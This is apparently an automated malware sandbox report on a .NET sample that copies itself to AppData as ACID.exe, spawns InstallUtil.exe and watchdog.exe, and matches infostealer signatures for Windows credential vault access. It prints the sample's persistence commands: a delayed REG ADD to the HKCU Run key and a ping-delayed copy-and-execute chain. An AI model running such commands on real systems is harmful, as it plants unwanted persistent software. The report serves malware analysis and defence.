                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_078FAC6C15_2_078FAC6C
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07A2064815_2_07A20648
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07A2BF7815_2_07A2BF78
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07A2063B15_2_07A2063B
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07A205D815_2_07A205D8
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07A2A52815_2_07A2A528
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07C5063815_2_07C50638
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07C57CB815_2_07C57CB8
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07C5A43015_2_07C5A430
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07C5B9C015_2_07C5B9C0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07C5B9AF15_2_07C5B9AF
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07C5F55815_2_07C5F558
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0836004015_2_08360040
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0836E44015_2_0836E440
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0836E3D515_2_0836E3D5
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852404815_2_08524048
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085228E015_2_085228E0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852E16815_2_0852E168
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085289E515_2_085289E5
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852A24815_2_0852A248
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08524A9915_2_08524A99
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852435015_2_08524350
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852004015_2_08520040
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852387815_2_08523878
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852386715_2_08523867
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852000615_2_08520006
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852403815_2_08524038
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085228CF15_2_085228CF
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852849815_2_08528498
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852848815_2_08528488
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08527D5815_2_08527D58
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08527D6815_2_08527D68
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08528A5015_2_08528A50
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852321015_2_08523210
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852320015_2_08523200
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08524AA615_2_08524AA6
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852434115_2_08524341
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08527F6115_2_08527F61
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0852679015_2_08526790
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08522B8015_2_08522B80
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085267A015_2_085267A0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BA57115_2_085BA571
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BBE5015_2_085BBE50
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085B9E4815_2_085B9E48
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085B823A15_2_085B823A
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BAF4215_2_085BAF42
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085B000615_2_085B0006
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BCCF815_2_085BCCF8
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BD8F015_2_085BD8F0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BCCE815_2_085BCCE8
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BD8E015_2_085BD8E0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BBD5815_2_085BBD58
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BE19815_2_085BE198
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085B9D9115_2_085B9D91
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BE18815_2_085BE188
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BE5B815_2_085BE5B8
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085B920915_2_085B9209
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BC29015_2_085BC290
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BDF5015_2_085BDF50
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BDF6015_2_085BDF60
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BDBE015_2_085BDBE0
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_085BA78815_2_085BA788
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0836001515_2_08360015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_01704BF816_2_01704BF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_0170BD2816_2_0170BD28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_0170BDDA16_2_0170BDDA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_01703FE016_2_01703FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_0170432816_2_01704328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8525816_2_06D85258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8312016_2_06D83120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D87A2016_2_06D87A20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8E44816_2_06D8E448
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8C22016_2_06D8C220
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8734016_2_06D87340
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8004016_2_06D80040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8000716_2_06D80007
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\watchdog.exe 2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
                    Source: image.exe, 00000000.00000002.2378327661.0000000002C39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs image.exe
                    Source: image.exe, 00000000.00000002.2390999485.00000000060C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHPzFG9.dll" vs image.exe
                    Source: image.exe, 00000000.00000002.2376546922.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs image.exe
                    Source: image.exe, 00000000.00000002.2396428280.0000000006F40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHPzFG9.dll" vs image.exe
                    Source: image.exe, 00000000.00000002.2390999485.0000000005D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHPzFG9.dll" vs image.exe
                    Source: image.exe, 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename71f02793-8af6-4f2d-86f0-bff8bc757609.exe4 vs image.exe
                    Source: image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename71f02793-8af6-4f2d-86f0-bff8bc757609.exe4 vs image.exe
                    Source: image.exe, 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAstronot plart.exe> vs image.exe
                    Source: image.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
                    Source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3e03900.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.6256fb8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: image.exe, Ec91Lr.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.image.exe.3c47d02.2.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: ACID.exe, 0000000F.00000002.3441640640.00000000011EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/10@3/4
                    Source: C:\Users\user\Desktop\image.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\image.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ACID.exeFile created: C:\Users\user\AppData\Local\Temp\watchdog.txtJump to behavior
                    Source: image.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: image.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ACID.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\image.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: image.exeReversingLabs: Detection: 34%
                    Source: C:\Users\user\Desktop\image.exeFile read: C:\Users\user\Desktop\image.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\image.exe "C:\Users\user\Desktop\image.exe"
                    Source: C:\Users\user\Desktop\image.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16
                    Source: C:\Users\user\Desktop\image.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 28 > nul && copy "C:\Users\user\Desktop\image.exe" "C:\Users\user\AppData\Roaming\ACID.exe" && ping 127.0.0.1 -n 28 > nul && "C:\Users\user\AppData\Roaming\ACID.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ACID.exe "C:\Users\user\AppData\Roaming\ACID.exe"
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess created: C:\Users\user\AppData\Local\Temp\watchdog.exe "C:\Users\user\AppData\Local\Temp\watchdog.exe"
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess created: C:\Users\user\AppData\Local\Temp\watchdog.exe "C:\Users\user\AppData\Local\Temp\watchdog.exe"
                    Source: C:\Users\user\Desktop\image.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 28 > nul && copy "C:\Users\user\Desktop\image.exe" "C:\Users\user\AppData\Roaming\ACID.exe" && ping 127.0.0.1 -n 28 > nul && "C:\Users\user\AppData\Roaming\ACID.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ACID.exe "C:\Users\user\AppData\Roaming\ACID.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess created: C:\Users\user\AppData\Local\Temp\watchdog.exe "C:\Users\user\AppData\Local\Temp\watchdog.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess created: C:\Users\user\AppData\Local\Temp\watchdog.exe "C:\Users\user\AppData\Local\Temp\watchdog.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\image.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
